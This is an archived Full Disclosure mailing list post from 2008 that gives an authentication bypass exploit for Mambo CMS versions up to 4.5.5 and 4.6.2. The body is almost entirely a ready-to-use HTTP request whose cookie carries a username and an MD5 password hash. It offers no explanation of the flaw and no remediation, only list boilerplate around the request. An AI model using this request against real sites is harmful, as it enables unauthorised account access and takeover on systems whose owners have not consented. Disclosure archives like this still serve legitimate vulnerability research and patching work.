|
Full Disclosure
mailing list archives
Mambo Cookie Authentication Bypass Exploit
From: "Halabaluza Team Halabaluza Team" <halabaluza.team () gmail com>
Date: Sun, 8 Jun 2008 13:29:56 +0200
for mambo <= 4.5.5 and <= 4.6.2 maybe others
GET http://[TARGET]/index.php
Host: [TARGET]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5)
Gecko/2008050509 Firefox/3.0b5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Connection: keep-alive
Cookie: usercookie[username]=[USERNAME];usercookie[password]=[MD5]
Cache-Control: max-age=0
FREE TIBET!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
- Mambo Cookie Authentication Bypass Exploit Halabaluza Team Halabaluza Team (Jun 09)
|
